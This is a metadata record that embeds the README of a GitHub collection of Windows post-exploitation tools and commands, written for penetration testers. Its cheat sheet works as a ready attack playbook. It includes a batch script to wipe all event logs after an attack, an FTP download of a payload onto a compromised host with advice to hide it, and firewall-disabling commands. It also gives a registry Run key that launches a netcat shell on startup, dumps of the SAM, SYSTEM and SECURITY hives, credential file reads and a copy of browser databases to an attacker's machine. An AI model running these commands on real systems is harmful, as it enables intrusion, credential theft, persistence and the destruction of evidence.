{"id":13510577,"url":"https://github.com/emilyanncr/Windows-Post-Exploitation","last_synced_at":"2025-03-30T16:34:07.774Z","repository":{"id":47375169,"uuid":"111175799","full_name":"emilyanncr/Windows-Post-Exploitation","owner":"emilyanncr","description":"Windows post-exploitation tools, resources, techniques and commands to use during post-exploitation phase of penetration test.  Contributions are appreciated.  Enjoy!","archived":false,"fork":false,"pushed_at":"2021-09-20T01:47:13.000Z","size":61,"stargazers_count":523,"open_issues_count":0,"forks_count":116,"subscribers_count":19,"default_branch":"master","last_synced_at":"2024-10-31T17:03:01.992Z","etag":null,"topics":["command-line","ethical-hacking","exploiting-windows","hacking","hacking-tool","post-exploitation"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/emilyanncr.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-11-18T04:16:41.000Z","updated_at":"2024-10-25T19:43:57.000Z","dependencies_parsed_at":"2022-08-22T09:30:47.912Z","dependency_job_id":null,"html_url":"https://github.com/emilyanncr/Windows-Post-Exploitation","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/emilyanncr%2FWindows-Post-Exploitation","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/emilyanncr%2FWindows-Post-Exploitation/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/emilyanncr%2FWindows-Post-Exploitation/releases","manifests_url":"https://repos.ecosyste.ms/ap
i/v1/hosts/GitHub/repositories/emilyanncr%2FWindows-Post-Exploitation/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/emilyanncr","download_url":"https://codeload.github.com/emilyanncr/Windows-Post-Exploitation/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222566739,"owners_count":17004237,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["command-line","ethical-hacking","exploiting-windows","hacking","hacking-tool","post-exploitation"],"created_at":"2024-08-01T02:01:44.943Z","updated_at":"2024-11-01T11:30:41.187Z","avatar_url":"https://github.com/emilyanncr.png","language":null,"funding_links":[],"categories":["Others","📎 Pentest Methodology","General","hacking-tool"],"sub_categories":["🧿 Post-Exploitation","Other awesome-Collections"],"readme":"# Awesome Windows Post Exploitation \n\nYour contributions and suggestions are heartily♥ welcome. (✿◕‿◕). Please check the [Contributing Guidelines](CONTRIBUTING.md) for more details. This work is licensed under a [Creative Commons Attribution 4.0 International License](http://creativecommons.org/licenses/by/4.0/).\n\nThis repo houses a multitude of articles and tools relating to the post exploitation of Windows machines.  Included is a complete list of commands to use once an OS shell has been established and you're **unable** to use meterpreter for whatever reason. 
\u003c- You won't find a more definitive list of its kind.\n\n## Contents\n\n* [Powershell](#powershell)\n* [Privilege Escalation Tools](#privilege-escalation-tools)\n* [Privilege Escalation Guides/Wiki](#privilege-escalation-guides/wiki)\n* [Post Exploitation Tools](#post-exploitation-tools)\n* [Post Exploitation Guides/Wiki](#post-exploitation-guides/wiki)\n* [Post Exploitation Techniques and Commands](#post-exploitation-techniques-and-commands) *Some of the commands listed are redundant.\n\n\n## PowerShell\n\n* [BloodHound](https://github.com/adaptivethreat/BloodHound) - Six Degrees of Domain Admin\n* [Empire](https://github.com/adaptivethreat/Empire) - Empire is a PowerShell and Python post-exploitation agent\n* [Generate-Macro](https://github.com/enigma0x3/Generate-Macro) - Powershell script will generate a malicious Microsoft Office document with a specified payload and persistence method\n* [Old-Powershell-payload-Excel-Delivery](https://github.com/enigma0x3/Old-Powershell-payload-Excel-Delivery) - This version touches disk for registry persistence\n* [PSRecon](https://github.com/gfoss/PSRecon) - PSRecon gathers data from a remote Windows host using PowerShell (v2 or later), organizes the data into folders, hashes all extracted data, hashes PowerShell and various system properties, and sends the data off to the security team\n* [PowerShell-Suite](https://github.com/FuzzySecurity/PowerShell-Suite) - Some useful scripts in powershell\n* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - A PowerShell Post-Exploitation Framework\n* [PowerTools](https://github.com/PowerShellEmpire/PowerTools) - A collection of PowerShell projects with a focus on offensive operations\n* [Powershell-C2](https://github.com/enigma0x3/Powershell-C2) - A PowerShell script to maintain persistence on a Windows machine\n* [Powershell-Payload-Excel-Delivery](https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery) - Uses Invoke-Shellcode to execute a payload and 
persist on the system\n* [mimikittenz](https://github.com/putterpanda/mimikittenz) - A post-exploitation powershell tool for extracting juicy info from memory.\n* [Empire](https://github.com/gold1029/Empire) - Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.\n\n## Privilege Escalation Tools\n\n* [Potato](https://github.com/foxglovesec/Potato) - Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012\n* [Windows Privilege Escalation](https://github.com/AusJock/Privilege-Escalation/tree/master/Windows) - Contains common local exploits and enumeration scripts\n* [Pentest Monkey Windows Privilege Escalation](http://pentestmonkey.net/uncategorized/from-local-admin-to-domain-admin) - Post-Exploitation in Windows: From Local Admin To Domain Admin (efficiently)\n* [Incognito](https://github.com/fdiskyou/incognito2) - Privilege Escalation Tool\n* [BeRoot](https://github.com/AlessandroZ/BeRoot) - The BeRoot Project finds common misconfigurations that can be leveraged for privilege escalation in Windows, Linux, and OS X environments.\n\n## Privilege Escalation Guides/Checklists\n\n* [Windows Privilege Escalation](http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation) - Windows Post-exploitation Wiki\n* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) - Fundamentals of Windows Privilege Escalation\n* [Security Implications of Windows Access Tokens - A Penetration Tester's Guide](https://www.exploit-db.com/docs/english/13054-security-implications-of-windows-access-tokens.pdf)\n* [Checklist - Windows Privilege Escalation](https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation) - Best tool to look for Windows local privilege escalation vectors.\n* [Windows Privilege Escalation guide](https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md) - Very thorough. 
Definitely one to check out first.\n* [Privilege Escalation Windows - OSCP](https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html) - Walks you through turning a low-privilege shell into a privileged shell.\n\n## Post Exploitation Tools\n\n* [mimikatz](https://github.com/gentilkiwi/mimikatz) - A little tool to play with Windows security - extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.\n* [Pazuzu](https://github.com/BorjaMerino/Pazuzu) - Reflective DLL to run binaries from memory\n* [UACME](https://github.com/hfiref0x/UACME) - Defeating Windows User Account Control\n* [Pupy](https://github.com/n1nj4sec/pupy) - Pupy is an open-source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in Python.\n* [Veil Pillage](https://github.com/Veil-Framework/Veil-Pillage) - Veil-Pillage is a post-exploitation framework that integrates with Veil-Evasion.\n* [Intersect](https://github.com/deadbits/Intersect-2.5) - Post exploitation framework.\n* [Koadic](https://github.com/zerosum0x0/koadic) - Koadic, or COM Command \u0026 Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.\n* [Invoke-AltDSBackdoor](https://github.com/enigma0x3/Invoke-AltDSBackdoor) - This script will obtain persistence on a Windows 7+ machine under both Standard and Administrative accounts by using two Alternate Data Streams\n* [hackarmoury](http://hackarmoury.com) - Upload common tools from the shell of a compromised machine via FTP and other protocols.
\n* [Invoke-LoginPrompt](https://github.com/enigma0x3/Invoke-LoginPrompt) - Invokes a Windows Security Login Prompt and outputs the clear text password\n* [PowerHub](https://github.com/AdrianVollmer/PowerHub) - A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting.\n* [LOLBAS](https://github.com/LOLBAS-Project/LOLBAS) and [LLOLBAS](https://github.com/AZSERG/LLOLBAS) - The LOLBAS Project helps you to search for possible privilege escalation paths on your machine whereas LLOLBAS allows you to tailor those paths to the specific machine. With these two tools combined, you are (almost) unstoppable on an engagement. And as an added benefit, it’s convenient to have offline tools available if a situation arises that demands them.\n\n## Post Exploitation Guides/Wikis\n\n* [Post Exploitation Wiki](https://github.com/mubix/post-exploitation-wiki) - Post exploitation wiki.\n* [Privilege escalation with Incognito](http://hardsec.net/post-exploitation-with-incognito/?lang=enPE%20with%20Incognito%C2%A0PE%20with%20Incognito) - How to use Incognito for Privilege Escalation in Windows\n* [Pwning Windows Domains from the Command Line](https://crowdshield.com/blog.php?name=pwning-windows-domains-from-the-command-line) - Several tools and techniques that can be used in order to compromise an entire Active Directory domain completely from the command line.\n* [Windows Post Exploitation Checklist](https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md)\n* [pwnwiki](http://pwnwiki.io) - Post Exploitation Wiki (Multi-Platform)\n* [Windows Domain: Pivot and Profit](http://www.fuzzysecurity.com/tutorials/25.html) - Techniques to move laterally when compromising a Windows machine.\n\n## Post-exploitation Techniques and Commands\n\n* [Useful Commands for Windows Administrators](http://www.robvanderwoude.com/ntadmincommands.php) - Post-exploitation techniques and commands to elicit 
information from shell of compromised windows machine.\n* [A-Z List of Windows Shell Commands](https://ss64.com/nt/) - A-Z Listing of all Windows CMD Commands\n* [Red Team Field Manual](https://github.com/Agahlot/RTFM/blob/master/rtfm-red-team-field-manual.pdf) - Windows Post-Exploitation techniques and commands.\n* [Windows \u0026 Active Directory Exploitation Cheat Sheet and Command Reference](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/) - Name says it all\n\n### Clear Log Files\nA simple script to clear logs post attack.\n\n**Create a batch file and execute it as admin.**\n\n  @echo off\n  FOR /F \"tokens=1,2*\" %%V IN ('bcdedit') DO SET adminTest=%%V\n  IF (%adminTest%)==(Access) goto noAdmin\n  for /F \"tokens=*\" %%G in ('wevtutil.exe el') DO (call :do_clear \"%%G\")\n  echo.\n  echo goto theEnd\n  :do_clear\n  echo clearing %1\n  wevtutil.exe cl %1\n  goto :eof\n  :noAdmin\n  exit\n  \n### Transfer files to compromised host via non-interactive shell \n\nIn cases where you want to upload a file onto the compromised machine but you don't have an interactive shell where you simply upload the file, you can write it onto the compromised machine using FTP, feeding it one line at a time.  \n\n**Create a blank file to write commands onto**\nftp -s:ftp_commands.txt\n\n**Echo each command (you can also do this all in one line):**\n\necho open 10.9.122.8\u003eftp_commands.txt\necho anonymous\u003eftp_commands.txt\necho blah\u003eftp_commands.txt\necho binary\u003eftp_commands.txt\necho get met8888.exe\u003eftp_commands.txt\necho bye\u003eftp_commands.txt\n\n*Instead of ftp_commands.txt, use a unique name, hide the file in a datastream, or hide the file in the folder. 
aka don't be obvi\n\n### Query state of Firewall, Disable Firewall, Allow a Service Through\n\n**Query state of firewall**:\n\nnetsh firewall show state\n\n**Disable firewall**\n\nnetsh.exe firewall set opmode mode=disable profile=all\n\n**Allow service through firewall**\n\nnetsh.exe firewall set portopening tcp 123 MYSERVICE enable all\n\nnetsh.exe firewall set allowedprogram C:\\MYPROGRAM.exe\n\nHKLM\\\\software\\\\microsoft\\\\windows\\\\ currentversion\\\\run –d ‘C:\\windows\\system32\\nc.exe -Ldp 4444 -e cmd.exe’ –v netcat\n\nnetsh firewall set allowedprogram c:\\nc.exe allow_nc ENABLE\n\n\n**Query current user and privilege information**\n\nwhoami\n\nwhoami /all\n\nwhoami /user\n\nwhoami /groups\n\nwhoami /priv\n\n**[Users]**\n\nnet users: list users\n\n**For more info on a user**:\n\nnet user \u003cusername\u003e (for a local user)\n\nnet user \u003cusername\u003e /domain (for a domain user)\n\n**View domain admins**:\n\nnet group \"Domain Admins\" /domain\n\n**View name of domain controller**:\n\nreg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\" /v DC\n\n**Add user**:\n\nnet users \u003cusername\u003e \u003cpassword\u003e /add\n\n**Add user to local administrators group**:\n\nnet localgroup administrators \u003cusername\u003e /add\n\n**Delete a user**:\n\nnet users \u003cusername\u003e /delete /domain\n\n**Change user's password**:\n\nnet users \u003cusername\u003e \u003cnew_password\u003e\n\n\n**[Accounts \u0026 Groups]**\n\nnet accounts\n\nnet accounts /domain\n\nnet localgroup administrators\n\nnet localgroup administrators /domain\n\nnet group \"Domain Admins\" /domain\n\nnet group \"Enterprise Admins\" /domain\n\nnet view /localgroup\n\nnet localgroup Administrators\n\nnet localgroup /domain\n\ngpresult: view group policy\n\ngpupdate: update group policy\n\ngpresult /z\n\n**[Network and misc information]**\n\nsysteminfo: lists information about the system\n\nipconfig /all: query IP configuration\n\nipconfig 
/displaydns\n\nroute print: prints the machine's routing table\n\narp -a: lists all systems currently in the machine's ARP table\n\nnslookup: query DNS server information\n\nnbtstat: displays protocol stats and current TCP/IP connections using NetBIOS over TCP/IP\n\nqwinsta: query info about RDP sessions\n\nnet session: query session information\n\nnet time \\\\computername (shows the time of the target computer)\n\nnet share: view shared resources on the network\n\n\n**[Query current drives on system]**\n\nfsutil fsinfo drives\n\n\n**[Grab SAM and SYSTEM files]**\n\ntype \"C:/windows/repair/SAM\"\n\ntype \"C:/windows/repair/SYSTEM\"\n\n\n**[Tasks]**\n\ntasklist /svc: lists running processes with the services hosted in each\n\ntaskkill /PID \u003cprocess ID\u003e /F : forcibly kill a task\n\ntaskkill /IM \u003cname\u003e* : kill by image name; the * wildcard kills all processes whose name starts with \u003cname\u003e\n\ntasklist /V /S computername: lists tasks with the users running them on a remote system. This will remove any IPC$ connection after it is done, so if you are using another user, you need to re-initiate the IPC$ mount\n\nqprocess *: similar to tasklist but easier to read\n\nat: query current scheduled tasks (legacy)\n\nschtasks: query scheduled tasks that your current user has access to see\n\nschtasks /query /fo csv /v \u003e %TEMP%\\tasks.csv\n\n\n**[Netstat]**\n\nnetstat -ano : see what services are listening on which ports, with owning PIDs\n\nnetstat -bano\n\nnetstat -r\n\nnetstat -na | findstr :443\n\n\n**[Query information about server and workstation, workstation domain name and logon domain]**\n\nnet config server\n\nnet config workstation\n\n\n**[Change to a different drive letter]**\n\ne.g. change to the D: drive and list its contents:\n\nd: \u0026 dir\n\ncd /d d: \u0026 dir\n\ndir \\\\computername\\share_or_admin_share\\ (lists a remote directory)\n\n**[Cat contents of a file located on the D: drive]**\n\ncd /d d: \u0026 type d:\\blah\\blah\n\n\n**[net view]**\n\nnet view /domain[:DomainName]\n\nnet view 
\\\\computerName\n\n\n**[Services]**\n\n**View services and programs started at startup**\n\nnet start\n\nwmic startup get caption,command\n\n\n**[Query, Stop/Start/Pause Installed Services]**\n\nsc query state= all\n\nsc query \u003cservice\u003e\n\nsc \u003cstart|stop|pause\u003e \u003cservice\u003e\n\n\n**[Remote System Access]**\n\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n\nnet share \\\\computername\n\ntasklist /V /S computername\n\nqwinsta /SERVER:computername\n\nqprocess /SERVER:computername\n\n\n**[WMI]**\n\nwmic bios\n\nwmic qfe\n\nwmic qfe get hotfixid (lists installed patch IDs)\n\nwmic startup\n\nwmic service\n\nwmic os\n\nwmic process get caption,executablepath,commandline\n\nwmic process call create \"process_name\" (executes a program)\n\nwmic process where name=\"process_name\" call terminate (terminates a program)\n\nwmic logicaldisk where drivetype=3 get name,freespace,systemname,filesystem,size,volumeserialnumber (hard drive information)\n\nwmic useraccount (usernames, SIDs, and various security-related goodies)\n\nwmic useraccount get /ALL\n\nwmic share get /ALL (append ? to any wmic command to get help)\n\nwmic startup list full (this can be a huge list!)\n\nwmic /node:\"hostname\" bios get serialnumber (this can be great for finding warranty info about the target)\n\n\n**[Reg Command]**\n\nreg save HKLM\\Security security.hive (save the Security hive to a file)\n\nreg save HKLM\\System system.hive (save the System hive to a file)\n\nreg save HKLM\\SAM sam.hive (save the SAM hive to a file)\n\nreg add [\\\\TargetIPaddr\\] [RegDomain]\\[Key]\n\nreg export [RegDomain]\\[Key] [FileName]\n\nreg import [FileName]\n\nreg query [\\\\TargetIPaddr\\] [RegDomain]\\[Key] /v [ValueName] 
(add /s to recurse all subkeys and values)\n\n\n**[Deleting Logs]**\n\nwevtutil el (list logs)\n\nwevtutil cl\n\n\n**[Uninstalling Software]**\n\nwmic product get name /value: lists installed software names\n\nwmic product where name=\"XXX\" call uninstall /Interactive:Off: uninstalls software\n\n\n**[Permissions]**\n\nicacls\n\nGrant full access over a directory and all folders and files beneath it:\n\nicacls \"C:\\windows\" /grant Administrator:F /T\n\nicacls \"C:\\\" /grant \"nt authority\\system\":F /T\n\n\n**[Net use]**\n\nnet use: map network shares\n\nnet use \\\\computername (maps IPC$, which does not show up as a drive)\n\nnet use \\\\computername /user:DOMAINNAME\\username password (maps IPC$ under another username)\n\n**[Mount a remote share with the rights of the current user]**:\n\nnet use K: \\\\\u003cip\u003e\\\u003cshare\u003e\n\ndir K:\n\n**[Enable remote desktop]**\n\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n\nnet session: list session information\n\n**[Other useful Commands]**\n\npkgmgr /iu:\"Package\"\n\npkgmgr /iu:\"TelnetServer\": install the telnet service\n\npkgmgr /iu:\"TelnetClient\"\n\nrundll32.exe user32.dll,LockWorkStation: locks the screen\n\nwscript.exe \u003cscript .js/.vbs\u003e\n\ncscript.exe \u003cscript .js/.vbs\u003e\n\nxcopy /C /S %appdata%\\Mozilla\\Firefox\\Profiles\\*.sqlite \\\\your_box\n\ntype \"C:\\documents and settings\\administrator\\userdata\\index.dat\"\n\ntype %WINDIR%\\System32\\drivers\\etc\\hosts: view contents of the hosts file\n\ntype \"c:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\Credentials\"\n\ncd \"C:\\Documents and settings\\administrator\\userdata\" \u0026 dir\n\ntype \"c:\\Documents and Settings\\Administrator\\Desktop\\UserMysql.txt\"\n\ntype \"c:\\Documents and Settings\\Administrator\\Application Data\\MySQL\\mysqlx_user_connections.xml\"\n\ntype \"C:\\documents and 
settings\\administrator\\userdata\\index.dat\"\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Femilyanncr%2FWindows-Post-Exploitation","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Femilyanncr%2FWindows-Post-Exploitation","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Femilyanncr%2FWindows-Post-Exploitation/lists"}